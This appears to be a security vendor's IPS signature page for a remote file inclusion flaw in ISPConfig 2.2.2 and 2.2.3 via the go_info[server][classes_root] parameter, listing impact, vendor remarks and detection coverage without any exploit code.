ISPConfig.Session.INC.PHP.Remote.File.Inclusion

description-logoDescription

It indicates a possible exploit of a file inclusion vulnerability in SPConfig that may allow remote attackers to execute arbitrary PHP code via a URL in the go_info[server][classes_root] parameter.

affected-products-logoAffected Products

ISPConfig ISPConfig 2.2.3
ISPConfig ISPConfig 2.2.2

Impact logoImpact

Compromise of the affected system.

recomended-action-logoRecommended Actions

The vendor reports that this issue is not exploitable on default configurations of the application, because the vulnerable file is not in the web root. However, the vendor has released an advisory to address this issue for situations where the vulnerable file is accessible remotely.

Telemetry logoTelemetry

Coverage

IPS (Regular DB)
IPS (Extended DB)